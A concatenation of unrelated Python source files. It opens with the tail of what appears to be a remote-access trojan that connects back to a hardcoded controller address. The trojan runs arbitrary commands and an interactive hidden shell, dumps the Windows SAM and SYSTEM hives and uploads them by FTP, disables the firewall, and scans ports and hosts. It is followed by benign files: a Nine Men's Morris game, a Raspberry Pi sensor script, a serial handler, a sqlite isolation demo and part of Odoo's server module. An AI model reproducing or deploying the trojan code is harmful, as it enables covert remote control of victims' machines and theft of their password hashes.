f.write(content_replace)
f.close()
server_socket.sendall('[*] %s Encoded By Base64' % (split[1]))
else:
server_socket.sendall('[*] %s Not Encoded By Base64' % (split[1]))
else:
server_socket.send('[*] Please Enter File !')
except Exception as error_base64:
server_socket.sendall(error_base64)
elif data.startswith('b64decode')==True:
filename_b64decode=data
split = shlex.split(filename_b64decode)
try:
if len(split)==2:
check_fb64 = os.path.exists(split[1])
if check_fb64 ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
encode = base64.b64decode(content)
content_replace = content.replace(content,encode)
f=open(split[1],'wb')
f.write(content_replace)
f.close()
server_socket.sendall('[*] %s Decoded By Base64' % (split[1]))
else:
server_socket.sendall('[*] %s Not Decoded By Base64' % (split[1]))
else:
server_socket.send('[*] Please Enter File Decode !')
except Exception as error_base64:
server_socket.sendall(error_base64)
elif data.startswith('help')==True:
server_socket.sendall('\n')
elif data.startswith('clear')==True:
server_socket.sendall('\n')
elif data.startswith('portscan')==True:
global port_scan
port_scan = []
target = data[9:]
def socket_port(ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
port_scan.append('[*] port : %s open !\n' % (port))
except:
pass
def start_thread_scanner_port(ip):
try:
i = 0
y = 0
while i<500:
try:
thread.start_new_thread(socket_port,(ip,y))
time.sleep(0.1)
y = y+1
i = i+1
except Exception as error_start_thread:
server_socket.send(error_start_thread)
except Exception as error_start_thread_scanner_port:
server_socket.send(error_start_thread_scanner_port)
start_thread_scanner_port(target)
x = 0
count_portscan = len(port_scan)
while x<count_portscan:
server_socket.send(port_scan[x])
x = x+1
port_scan = []
elif data.startswith('ls') or data.startswith('dir')==True:
try:
ld = glob.glob('*')
hd = glob.glob('.*')
for hrepo in hd:
server_socket.send('%s\n' % (hrepo))
for repo in ld:
server_socket.send('%s\n' % (repo))
except Exception as error_list_dir:
server_socket.send(error_list_dir)
elif data.startswith('dump_sam_system')==True:
try:
dump_db = os.system('reg save hklm\\sam C:\\sam && reg save hklm\\system C:\\system > NUL')
if dump_db ==0:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename_sam = 'C:\\sam'
filename_system = 'C:\\system'
file1 = open(filename_sam,'rb')
file2 = open(filename_system,'rb')
connect.storbinary('STOR '+filename_sam, file1)
connect.storbinary('STOR '+filename_system, file2)
file.close()
connect.quit()
server_socket.send('[*] Sam & System File DB Downloaded !')
else:
server_socket.send('[*] Error Dump Sam & System !')
except:
server_socket.send('[*] Error Dump SAM & SYSTEM FILE !')
elif data.startswith('kwindef')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('netsh advfirewall set allprofiles state off', startupinfo=info, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
server_socket.send('[*] Kill Windows Defender !')
except:
server_socket.send('[*] Error show wifi passwd')
elif data.startswith('ps')==True:
try:
if 'Linux' not in platform.platform():
tsklist_exec = subprocess.Popen(['tasklist'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_tsklist = tsklist_exec.stdout.read() + tsklist_exec.stderr.read()
server_socket.sendall(out_tsklist)
server_socket.send('\n')
elif 'Windows' not in platform.platform():
cmd_ps = 'ps -aux'
ps_exec = subprocess.Popen(cmd_ps,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_ps_exec = ps_exec.stdout.read() + ps_exec.stderr.read()
server_socket.sendall(out_ps_exec)
server_socket.send('\n')
except Exception as error_processus_list:
server_socket.sendall(error_processus_list)
elif data.startswith('ipgeo')==True:
try:
r = requests.get('https://ipinfo.io/json')
content_requests = r.text
obj = json.loads(content_requests)
ip = obj['ip'].encode('utf-8')
city = obj['city'].encode('utf-8')
region = obj['region'].encode('utf-8')
country = obj['country'].encode('utf-8')
loc = obj['loc'].encode('utf-8')
google_link = 'https://www.google.com/maps/@%s,16z' % (loc)
server_socket.sendall('[*] IP : '+str(ip)+'\n[*] CITY : '+str(city)+'\n[*] REGION : '+str(region)+'\n[*] COUNTRY : '+str(country)+'\n[*] LOCATION : '+str(loc)+'\n[*] GOOGLE MAP : '+str(google_link)+'\n\n')
except Exception as error_ipgeo:
server_socket.sendall(error_ipgeo)
elif data.startswith('cmd')==True:
cmd = data[4:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_exec = subprocess.Popen(cmd, shell=True, startupinfo=info,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_exec = cmd_exec.stdout.read() + cmd_exec.stderr.read()
server_socket.sendall(out_cmd_exec)
elif 'Windows' not in platform.platform():
cmd_exec = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_exec = cmd_exec.stdout.read() + cmd_exec.stderr.read()
server_socket.sendall(out_cmd_exec)
except Exception as error_sh_execute:
server_socket.send('[*] Error Sh Execute Command ! : %s ' % (error_sh_execute))
elif data.startswith('shell')==True:
if 'Linux' not in platform.platform():
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
p=subprocess.Popen(["c:\\windows\\system32\\cmd.exe"], shell=False, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=server2popen, args=[server_socket, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=popen2socket, args=[server_socket, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
server_socket.sendall('[*] CTRL + C')
except Exception as error_windows_server_config:
server_socket.sendall(error_windows_server_config)
elif 'Windows' not in platform.platform():
try:
os.dup2(server_socket.fileno(),0)
os.dup2(server_socket.fileno(),1)
os.dup2(server_socket.fileno(),2)
p=subprocess.call(["/bin/bash"])
except KeyboardInterrupt:
server_socket.sendall('[*] CTRL + C')
elif data.startswith('nscan')==True:
server_socket.send('[*] Wait few seconds Please.. Scanning Network')
start_scanner_network()
i = 0
count_host = len(host_alive)
while i<count_host:
server_socket.send(host_alive[i])
i = i+1
else:
server_socket.sendall('[*] Error Command !')
except Exception as error_main_server:
server_socket.sendall(error_main_server)
def main():
LHOST = '192.168.1.71'
LPORT = 1334
FTPHOST = LHOST
FTPPORT = 21
FTP_USER = 'unamed'
FTP_PASSWD = 'test123'
LOG_DIR_KEY = '/home/'
LOG_FILE_KEY = 'key.txt'
sys_required()
main_config_server(LHOST,LPORT,FTPHOST,FTPPORT,FTP_USER,FTP_PASSWD,LOG_DIR_KEY,LOG_FILE_KEY)
if __name__ =='__main__':
main()
|
mills_old.py
|
#!/usr/bin/env python
import numpy as np
import ai
import pygame
from time import sleep
from threading import Thread
from threading import Event
# SETTINGS
GUI = True
BACKGROUND = (90, 90, 90) # gray
PLAYER1 = (240, 240, 240) # almost white
PLAYER2 = (10, 10, 10) # almost black
TEXT = (50, 50, 240)
pygame.font.init()
myfont = pygame.font.SysFont('Comic Sans MS', 30)
LINES = (255, 255, 255) # white
TAKE_PIECE_REWARD = 0.2
WIN_REWARD = 1
# globals - don't change
clickCondition = Event()
clickX = 0
clickY = 0
# pygame input
def blockGetClickIndex():
global clickX, clickY, clickCondition
# wait for click event and copy coordinates
while clickX == clickY == 0:
try:
clickCondition.wait(1)
except KeyboardInterrupt:
return -1
x = clickX
y = clickY
clickX = clickY = 0
clickCondition.clear()
# look up piece
for i in range(24):
dx = x - 50 * getCoords(i)[0]
dy = y - 50 * getCoords(i)[1]
if dx ** 2 + dy ** 2 <= 30 ** 2: # x^2 + y^2 <= r^2
return i
return -1
# Lookup table for what fields are above others, nicer and more readable than if's
above_arr = [-1, -1, -1, -1, 1, -1, -1, 4, -1, 0, 3, 6, 8, 5, 2, 11, -1, 12, 10, 16, 13, 9, 19, 14]
# Lookup table for coordinates
coord_arr = np.array([(1,1), (7,1), (13,1), (3,3), (7,3), (11,3), (5,5), (7,5), (9,5), (1,7), (3,7), (5,7),
(9,7), (11,7), (13,7), (5,9), (7,9), (9,9), (3,11), (7,11), (11,11), (1,13), (7,13), (13,13)], dtype=[('x', 'i4'),('y', 'i4')])
def indexAbove(i):
return above_arr[i]
def indexBelow(i):
try:
return above_arr.index(i)
except ValueError:
return -1
def indexLeft(i):
if i % 3 == 0:
return -1
else:
return i-1
def indexRight(i):
if i % 3 == 2:
return -1
else:
return i+1
def getCoords(i):
return [coord_arr['x'][i], coord_arr['y'][i]]
def isInMill(board, i):
if i == -1:
return False
else:
return (safeGet(board, indexAbove(i)) == safeGet(board, indexAbove(indexAbove(i))) == board[i] != 2) or \
(safeGet(board, indexAbove(i)) == safeGet(board, indexBelow(i)) == board[i] != 2) or \
(safeGet(board, indexBelow(i)) == safeGet(board, indexBelow(indexBelow(i))) == board[i] != 2) or \
(safeGet(board, indexLeft(i)) == safeGet(board, indexLeft(indexLeft(i))) == board[i] != 2) or \
(safeGet(board, indexLeft(i)) == safeGet(board, indexRight(i)) == board[i] != 2) or \
(safeGet(board, indexRight(i)) == safeGet(board, indexRight(indexRight(i))) == board[i] != 2)
def safeGet(board, i):
if i < 0 or i >= len(board):
return 2
return board[i]
class GameState:
def reset(self):
self.board = np.zeros(24)
self.opponent_num_pieces = 9
self.player_num_pieces = 9
def __init__(self):
self.board = np.zeros(24)
self.opponent_num_pieces = 9
self.player_num_pieces = 9
if GUI: # Init pygame
pygame.init()
self.screen = pygame.display.set_mode((700, 700))
pygame.display.set_caption("Nine Men's Morris")
self.screen.fill(BACKGROUND)
self.clock = pygame.time.Clock()
self.init_gui()
def init_gui(self):
# Create thread to update gui
thread = Thread(target=self.update_gui)
thread.start()
def update_gui(self):
done = False
while not done:
global clickX, clickY, clickCondition
try:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
clickCondition.set()
elif event.type == pygame.MOUSEBUTTONDOWN:
clickX, clickY = pygame.mouse.get_pos()
clickCondition.set()
self.screen.fill(BACKGROUND)
# Upper horizontal lines
self.draw_line([1, 1], [13, 1])
self.draw_line([3, 3], [11, 3])
self.draw_line([5, 5], [9, 5])
# Lower horizontal lines
self.draw_line([5, 9], [9, 9])
self.draw_line([3, 11], [11, 11])
self.draw_line([1, 13], [13, 13])
# Middle horizontal lines
self.draw_line([1, 7], [5, 7])
self.draw_line([9, 7], [13, 7])
# Draw board
for i in range(len(self.board)):
self.draw_piece(i, self.board[i])
# Update display
pygame.display.flip()
# Update GUI with 60 FPS
self.clock.tick(60)
except pygame.error:
import sys
sys.exit(0)
pygame.quit()
def draw_line(self, start, end):
pygame.draw.line(self.screen, LINES, [x * 50 for x in start], [x * 50 for x in end], 10)
pygame.draw.line(self.screen, LINES, [x * 50 for x in start[::-1]], [x * 50 for x in end[::-1]], 10)
def draw_piece(self, index, value):
pos = getCoords(index)
if value != 0:
if value > 0:
color = PLAYER1
else:
color = PLAYER2
pygame.draw.circle(self.screen, color, [x * 50 for x in pos], 30)
pygame.draw.circle(self.screen, [x - 10 for x in color], [x * 50 for x in pos], 30, 5)
self.screen.blit(myfont.render(str(index), False, TEXT), [x*50-30 for x in pos])
def frame_step(self, input_vect, execute_opponent=True, skip_player=False, color=1):
if color == 1:
num_pieces = self.player_num_pieces
else:
num_pieces = self.opponent_num_pieces
enemy_reward = 0
reward = 0
terminal = False
start = -1
if not skip_player:
# -------------------- FIGURE OUT MOVE --------------------
if num_pieces > 0: # Set down piece
#print('can set down a piece') # DEBUG
x = np.argsort(input_vect) # list of indices, sorted 0 -> max
i = -1
while self.board[x[i]] != 0:
i-=1
dest = x[i]
if color == 1:
self.player_num_pieces -= 1
else:
self.opponent_num_pieces -= 1
else: # Move piece
# Find best moves according to input_vect
if len(self.board[self.board == color]) == 3: # Can jump
#print('can jump') # DEBUG
x = np.argsort(input_vect)
# start = worst own field
i = 0
while self.board[x[i]] != color:
i+=1
start = x[i]
# dest = best free field
i = -1
while self.board[x[i]] != 0:
i-=1
dest = x[i]
else: # Can't jump
#print('can\'t jump') # DEBUG
# Functions to get neighbouring positions
fs = [indexAbove, indexBelow, indexLeft, indexRight]
# Map to hold scores
map_type = [('start', 'i4'),('dest', 'i4'), ('score', 'f4')]
_map = np.array([], dtype=map_type)
# Loop to check all possible moves
for s in range(0,24):
if self.board[s] == color:
for f in fs:
d = f(s)
if d != -1 and self.board[d] == 0:
score = input_vect[d] - input_vect[s]
_map = np.append(_map, np.array((s,d,score), dtype=map_type))
# Find best move
try:
best = np.argmax(_map['score']) # throws ValueError if empty
start = _map['start'][best]
dest = _map['dest'][best]
except ValueError:
dest = -1
start = -1
# -------------------- EXECUTE MOVE --------------------
if dest == -1: # Stuck
#print('is stuck') # DEBUG
reward = -WIN_REWARD
terminal = True
self.reset()
else:
# Execute
if start != -1: # If we're still setting up
self.board[start] = 0
self.board[dest] = color
# If mill closed, remove best opponent piece
if isInMill(self.board, dest):
#print('closed mill') # DEBUG
x = np.argsort(input_vect)
# best = best enemy field not in mill
i = -1
while self.board[x[i]] != -color or isInMill(self.board, x[i]):
i-=1
if i < -len(x): # all opponent pieces considered, but all in mill -> take best piece, even if in mill
i = -1
break
best = x[i]
# Remove best piece
self.board[best] = 0
reward = TAKE_PIECE_REWARD
# Check if gameOver
if len(self.board[self.board == -color]) < 3:
terminal = True
reward = WIN_REWARD
self.reset()
if execute_opponent:
# look up num_pieces for opponent
if color == 1:
num_opp_pieces = self.opponent_num_pieces
else:
num_opp_pieces = self.player_num_pieces
# execute AI
_, moves = ai.calcMove(self.board, -1, num_opp_pieces, num_pieces)
for m in moves:
print('move: ' + str(m))
if m[0] != -1:
self.board[m[0]] = 0
if m[1] != -1:
self.board[m[1]] = -1
# decrease num_pieces for opponent
if color == 1:
self.opponent_num_pieces -= 1
else:
self.player_num_pieces -= 1
# Check if gameOver
if terminal:
self.reset()
return self.board, reward - enemy_reward, terminal
|
practice.py
|
import sys, os, imp, time
import RPi.GPIO as GPIO
import threading
GPIO.setmode(GPIO.BCM)
# # TODO a function that returns the detected particle concentration
# based on measurement data and mathematic model, possibly requires import of .mdl
# Currently a dummy function.
def get_detected_level():
led.emitter(True)
time.sleep(1)
res = TSL2561.fullSpectrumValue()
return res
# TODO a function that reports detected level visually, viz. via LCD, LED
def report_result():
result = get_detected_level()
lcd.lcd_clear_screen()
lcd.lcd_text('Lux = ', lcd.LCD_LINE_1)
lcd.lcd_text(str(result), lcd.LCD_LINE_2)
# Pin to which the button to enter user mode is connected
PUSH_BUTTON_PIN = 21
GPIO.setup(PUSH_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
usermode = False
def enter_user_mode(channel):
global usermode
usermode = True
GPIO.add_event_detect(PUSH_BUTTON_PIN, GPIO.RISING, callback=enter_user_mode, bouncetime=200)
# The threshold used to confirm that blue light emitters are connected.
# Set to be half of expected value when on.
EMITTER_THRESHOLD_LUX = 1000
# Import LCD
# home_dir = os.path.expanduser("/home/pi/2019-genas-china-smart-device")
# lcd_file = os.path.join(home_dir, "LCD1602/lcd.py")
# lcd = imp.load_source('lcd', lcd_file)
try:
import lcd
lcd.setup()
lcd_welcome = threading.Thread(target=lcd.lcd_success_message)
lcd_welcome.start()
except:
print("FATAL: LCD IMPORT FAILURE")
exit()
# Import TCS34725
try:
# tcs_file = os.path.join(home_dir, "TCS34725/Adafruit_TCS34725.py")
# Adafruit_TCS34725 = imp.load_source('TCS34725', tcs_file)
import Adafruit_TCS34725
import smbus
tcs = Adafruit_TCS34725.TCS34725()
tcs.set_interrupt(True)
r, g, b, c = tcs.get_raw_data()
lux = Adafruit_TCS34725.calculate_lux(r, g, b)
print('Current color in box: red={0} green={1} blue={2} clear={3}. Lux={4}'.format(r, g, b, c, lux))
# TCS34725 functions
# # Read the R, G, B, C color data.
# r, g, b, c = tcs.get_raw_data()
# # Calculate color temperature using utility functions. You might also want to
# # check out the colormath library for much more complete/accurate color functions.
# color_temp = Adafruit_TCS34725.calculate_color_temperature(r, g, b)
# # Calculate lux with another utility function.
# lux = Adafruit_TCS34725.calculate_lux(r, g, b)
# lcd.lcd_text('R={0} G={1} B={2} C={3} L={4}'.format(r, g, b, c, lux), lcd.LCD_LINE_2)
# time.sleep(1)
# lcd.lcd_clear_screen()
except:
lcd.lcd_text("TCS34725 FAIL", lcd.LCD_LINE_2)
exit()
# Import LED
try:
import led
except:
lcd.lcd_text("LED FAIL", lcd.LCD_LINE_2)
exit()
# Import DS18B20
try:
from w1thermsensor import W1ThermSensor
temp_sensor = W1ThermSensor()
except:
lcd.lcd_text("DS18B20 FAIL", lcd.LCD_LINE_2)
exit()
# Import TSL2561
try:
import TSL2561
except:
lcd.lcd_text("TSL2561 FAIL", lcd.LCD_LINE_2)
exit()
def testEmitter():
led.emitter(True)
blankValue = TSL2561.visibleValue()
time.sleep(1)
coloredValue = TSL2561.visibleValue()
if (coloredValue - blankValue) < EMITTER_THRESHOLD_LUX:
# Emitter not connected4
lcd.lcd_text("Emitter FAIL", lcd.LCD_LINE_1)
sys.exit()
else:
led.emitter(False)
return
lcd_welcome.join()
emitterTest = threading.Thread(target=testEmitter)
emitterTest.start()
emitterTest.join()
led.emitter(False)
lcd.lcd_text("All OK", lcd.LCD_LINE_1)
lcd.lcd_text("Lux={0},T={1}".format(TSL2561.visibleValue(), temp_sensor.get_temperature()), lcd.LCD_LINE_2)
time.sleep(1)
# Print out Wi-Fi SSID and local IP address if connected
lcd.lcd_clear_screen()
# Tries to connect to Wi-Fi and print out
# information only when not in usermode yet
if not usermode:
count = 0
while True:
wifi_name = os.popen('iwgetid -r').read()
wifi_name = wifi_name[0:(len(wifi_name)-1)].strip()
if(wifi_name == ''):
time.sleep(1)
count = count + 1
elif count > 15:
break
else:
break
if count > 15:
lcd.lcd_text("Wi-Fi", lcd.LCD_LINE_1)
lcd.lcd_text("Not connected", lcd.LCD_LINE_2)
else:
wifi_name = os.popen('iwgetid -r').read()
wifi_name = wifi_name[0:(len(wifi_name)-1)].strip()
ipaddr = os.popen('hostname -I').read()
ipaddr = ipaddr[0:(len(ipaddr)-1)].strip()
lcd.lcd_text(wifi_name, lcd.LCD_LINE_1)
lcd.lcd_text(ipaddr, lcd.LCD_LINE_2)
tick = 0
while True:
if usermode:
break
if tick > 15:
sys.exit() # Exit program if user did not specify usermode in 15 seconds
tick = tick + 1
time.sleep(1)
# Usermode now
lcd.lcd_clear_screen()
lcd.lcd_text('User Mode', lcd.LCD_LINE_1)
GPIO.remove_event_detect(PUSH_BUTTON_PIN)
time.sleep(1)
while True:
GPIO.output(led.WHITE_LED_PIN, True)
lcd.lcd_clear_screen()
lcd.lcd_text('Put in sample', lcd.LCD_LINE_1)
lcd.lcd_text('Push btn on done', lcd.LCD_LINE_2)
GPIO.wait_for_edge(PUSH_BUTTON_PIN, GPIO.RISING)
GPIO.output(led.WHITE_LED_PIN, False)
threading.Thread(target=led.blink_led, args=(led.BLUE_LED_PIN, 0.3, 0.3,)).start()
lcd.lcd_clear_screen()
lcd.lcd_text('Detecting', lcd.LCD_LINE_1)
report_result()
led.stop_blinking()
GPIO.wait_for_edge(PUSH_BUTTON_PIN, GPIO.RISING)
|
serial_io.py
|
from __future__ import division
import json
import time
import serial as _serial
import platform
import sys
if sys.version_info >= (3, 0):
import queue
else:
import Queue as queue
from threading import Event, Thread
from serial.tools.list_ports import comports
from . import IOHandler
try:
JSONDecodeError = json.decoder.JSONDecodeError
except AttributeError:
JSONDecodeError = ValueError
class Serial(IOHandler):
poll_frequency = 200
@classmethod
def available_hosts(cls):
devices = comports(include_links=True)
return [d.device for d in devices]
@classmethod
def is_host_compatible(cls, host):
return host in cls.available_hosts()
def __init__(self, host, baudrate=1000000):
self._serial = _serial.Serial(host, baudrate)
self._serial.flush()
self._msg = queue.Queue(100)
self._running = True
self._poll_loop = Thread(target=self._poll)
self._poll_loop.daemon = True
self._poll_loop.start()
def is_ready(self):
if self._serial.in_waiting == 0:
return False
try:
self.read()
return True
except (UnicodeDecodeError, JSONDecodeError):
return False
def recv(self):
return self._msg.get()
def write(self, data):
self._serial.write(data + '\r'.encode())
def close(self):
self._running = False
self._poll_loop.join()
self._serial.close()
def _poll(self):
def extract_line(s):
j = s.find(b'\n')
if j == -1:
return b'', s
# Sometimes the begin of serial data can be wrong remove it
# Find the first '{'
x = s.find(b'{')
if x == -1:
return b'', s[j + 1:]
return s[x:j], s[j + 1:]
period = 1 / self.poll_frequency
buff = b''
while self._running:
to_read = self._serial.in_waiting
if to_read == 0:
time.sleep(period)
continue
s = self._serial.read(to_read)
buff = buff + s
while self._running:
line, buff = extract_line(buff)
if not len(line):
break
if self._msg.full():
self._msg.get()
self._msg.put(line)
|
sqlite3_isolation_levels.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Illustrate the effect of isolation levels.
"""
#end_pymotw_header
import logging
import sqlite3
import sys
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s (%(threadName)-10s) %(message)s',
)
db_filename = 'todo.db'
isolation_level = sys.argv[1]
def writer():
with sqlite3.connect(
db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
cursor.execute('update task set priority = priority + 1')
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('PAUSING')
time.sleep(1)
conn.commit()
logging.debug('CHANGES COMMITTED')
def reader():
with sqlite3.connect(
db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('wait over')
cursor.execute('select * from task')
logging.debug('SELECT EXECUTED')
cursor.fetchall()
logging.debug('results fetched')
if __name__ == '__main__':
ready = threading.Event()
threads = [
threading.Thread(name='Reader 1', target=reader),
threading.Thread(name='Reader 2', target=reader),
threading.Thread(name='Writer 1', target=writer),
threading.Thread(name='Writer 2', target=writer),
]
[t.start() for t in threads]
time.sleep(1)
logging.debug('setting ready')
ready.set()
[t.join() for t in threads]
|
server.py
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import random
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest
import psutil
import werkzeug.serving
from werkzeug.debug import DebuggedApplication
if os.name == 'posix':
# Unix only for workers
import fcntl
import resource
try:
import inotify
from inotify.adapters import InotifyTrees
from inotify.constants import IN_MODIFY, IN_CREATE, IN_MOVED_TO
INOTIFY_LISTEN_EVENTS = IN_MODIFY | IN_CREATE | IN_MOVED_TO
except ImportError:
inotify = None
else:
# Windows shim
signal.SIGHUP = -1
inotify = None
if not inotify:
try:
import watchdog
from watchdog.observers import Observer
from watchdog.events import FileCreatedEvent, FileModifiedEvent, FileMovedEvent
except ImportError:
watchdog = None
# Optional process names for workers
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import odoo
from odoo.modules import get_modules
from odoo.modules.module import run_unit_tests, get_test_modules
from odoo.modules.registry import Registry
from odoo.release import nt_service_name
from odoo.tools import config
from odoo.tools import stripped_sys_argv, dumpstacks, log_ormcache_stats
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
"""
:return: the relevant memory usage according to the OS in bytes.
"""
# psutil < 2.0 does not have memory_info, >= 3.0 does not have get_memory_info
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
# MacOSX allocates very large vms to all processes so we only monitor the rss usage.
if platform.system() == 'Darwin':
return pmem.rss
return pmem.vms
def set_limit_memory_hard():
if os.name == 'posix' and config['limit_memory_hard']:
rlimit = resource.RLIMIT_RSS if platform.system() == 'Darwin' else resource.RLIMIT_AS
soft, hard = resource.getrlimit(rlimit)
resource.setrlimit(rlimit, (config['limit_memory_hard'], hard))
def empty_pipe(fd):
try:
while os.read(fd, 1):
pass
except OSError as e:
if e.errno not in [errno.EAGAIN]:
raise
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
def handle_error(self, request, client_address):
t, e, _ = sys.exc_info()
if t == socket.error and e.errno == errno.EPIPE:
# broken pipe, ignore error
return
_logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "127.0.0.1", 0, app)
# Directly close the socket. It will be replaced by WorkerHTTP when processing requests
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
def setup(self):
# timeout to avoid chrome headless preconnect during tests
if config['test_enable'] or config['test_file']:
self.timeout = 5
# flag the current thread as handling a http request
super(RequestHandler, self).setup()
me = threading.currentThread()
me.name = 'odoo.service.http.request.%s' % (me.ident,)
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def __init__(self, host, port, app):
# The ODOO_MAX_HTTP_THREADS environment variable allows to limit the amount of concurrent
# socket connections accepted by a threaded server, implicitly limiting the amount of
# concurrent threads running for http requests handling.
self.max_http_threads = os.environ.get("ODOO_MAX_HTTP_THREADS")
if self.max_http_threads:
try:
self.max_http_threads = int(self.max_http_threads)
except ValueError:
# If the value can't be parsed to an integer then it's computed in an automated way to
# half the size of db_maxconn because while most requests won't borrow cursors concurrently
# there are some exceptions where some controllers might allocate two or more cursors.
self.max_http_threads = config['db_maxconn'] // 2
self.http_threads_sem = threading.Semaphore(self.max_http_threads)
super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
handler=RequestHandler)
# See https://github.com/pallets/werkzeug/pull/770
# This allow the request threads to not be set as daemon
# so the server waits for them when shutting down gracefully.
self.daemon_threads = False
def server_bind(self):
SD_LISTEN_FDS_START = 3
if os.environ.get('LISTEN_FDS') == '1' and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(SD_LISTEN_FDS_START, socket.AF_INET, socket.SOCK_STREAM)
_logger.info('HTTP service (werkzeug) running through socket activation')
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.server_name, self.server_port)
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
def process_request(self, request, client_address):
"""
Start a new thread to process the request.
Override the default method of class socketserver.ThreadingMixIn
to be able to get the thread object which is instantiated
and set its start time as an attribute
"""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.type = 'http'
t.start_time = time.time()
t.start()
# TODO: Remove this method as soon as either of the revision
# - python/cpython@8b1f52b5a93403acd7d112cd1c1bc716b31a418a for Python 3.6,
# - python/cpython@908082451382b8b3ba09ebba638db660edbf5d8e for Python 3.7,
# is included in all Python 3 releases installed on all operating systems supported by Odoo.
# These revisions are included in Python from releases 3.6.8 and Python 3.7.2 respectively.
def _handle_request_noblock(self):
"""
In the python module `socketserver` `process_request` loop,
the __shutdown_request flag is not checked between select and accept.
Thus when we set it to `True` thanks to the call `httpd.shutdown`,
a last request is accepted before exiting the loop.
We override this function to add an additional check before the accept().
"""
if self._BaseServer__shutdown_request:
return
if self.max_http_threads and not self.http_threads_sem.acquire(timeout=0.1):
# If the semaphore is full we will return immediately to the upstream (most probably
# socketserver.BaseServer's serve_forever loop which will retry immediately as the
# selector will find a pending connection to accept on the socket. There is a 100 ms
# penalty in such case in order to avoid cpu bound loop while waiting for the semaphore.
return
# upstream _handle_request_noblock will handle errors and call shutdown_request in any cases
super(ThreadedWSGIServerReloadable, self)._handle_request_noblock()
def shutdown_request(self, request):
if self.max_http_threads:
# upstream is supposed to call this function no matter what happens during processing
self.http_threads_sem.release()
super().shutdown_request(request)
#----------------------------------------------------------
# FileSystem Watcher for autoreload and cache invalidation
#----------------------------------------------------------
class FSWatcherBase(object):
def handle_file(self, path):
if path.endswith('.py') and not os.path.basename(path).startswith('.~'):
try:
source = open(path, 'rb').read() + b'\n'
compile(source, path, 'exec')
except IOError:
_logger.error('autoreload: python code change detected, IOError for %s', path)
except SyntaxError:
_logger.error('autoreload: python code change detected, SyntaxError in %s', path)
else:
if not getattr(odoo, 'phoenix', False):
_logger.info('autoreload: python code updated, autoreload activated')
restart()
return True
class FSWatcherWatchdog(FSWatcherBase):
def __init__(self):
self.observer = Observer()
for path in odoo.addons.__path__:
_logger.info('Watching addons folder %s', path)
self.observer.schedule(self, path, recursive=True)
def dispatch(self, event):
if isinstance(event, (FileCreatedEvent, FileModifiedEvent, FileMovedEvent)):
if not event.is_directory:
path = getattr(event, 'dest_path', event.src_path)
self.handle_file(path)
def start(self):
self.observer.start()
_logger.info('AutoReload watcher running with watchdog')
def stop(self):
self.observer.stop()
self.observer.join()
class FSWatcherInotify(FSWatcherBase):
def __init__(self):
self.started = False
# ignore warnings from inotify in case we have duplicate addons paths.
inotify.adapters._LOGGER.setLevel(logging.ERROR)
# recreate a list as InotifyTrees' __init__ deletes the list's items
paths_to_watch = []
for path in odoo.addons.__path__:
